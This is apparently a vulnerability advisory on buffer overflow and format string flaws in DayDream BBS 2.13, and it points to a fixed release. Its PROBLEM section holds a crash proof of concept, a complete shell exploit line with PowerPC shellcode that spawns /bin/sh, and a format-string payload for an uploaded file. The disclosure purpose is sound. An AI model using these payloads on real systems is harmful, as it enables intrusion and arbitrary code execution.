COMMAND

	DayDream BBS buffer overflow and format string vulnerabilities

SYSTEMS AFFECTED

	DayDream BBS 2.13

PROBLEM

	KF (dotslash@snosoft.com) revealed :
	

	1- Buffer Overflow
	

	Text file control codes ~#MC, ~#TF and ~#RA were  vulnerable  to  buffer
	overflow attack, for instance :
	 

	[root@linuxppc bbs]# echo \"~#MC\"`perl -e \'print \"A\" x 1596\'`\\|>

	display/iso/welcome.gfx

	[root@linuxppc bbs]# ./daydream   

	Fill in user name /pass, and see daydream crash

	

	

	Exploit line for shell :
	

	[root@linuxppc root]# echo \"~#MC\"`perl -e \'print \"\\x60\\x69\\x69\\x69\" x 392\'``perl -e \'print

	\"\\x40\\x82\\xff\\xfd\\x7f\\xe8\\x02\\xa6\\x3b\\xff\\x01\\x2c\\x38\\x7f\\xfe\\xf4\\x90\\x61\\xff\\xf8\\x90\\xa1\\xff\\xfc\\x3b\\xc0\\x16\\x01\\x7f\\xc0\\x4e\\x70\\x44\\xff\\xff\\x02\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\" 

	x 1\'`A`perl -e \'print \"\\x7f\\xff\\xd4\\xd8\"\'`\\| > /home/bbs/display/iso/welcome.gfx

	

	

	2- Format string
	

	Sample, self explanatory :
	

	

	echo \"~#RA%s%s%s%s%s%s\" > filetoupload.gfx

	Then place this file on the server and view it via the menu system.

	

	

	

SOLUTION

	Latest version is not vulnerable, get it from :
	

	http://daydream.iwn.fi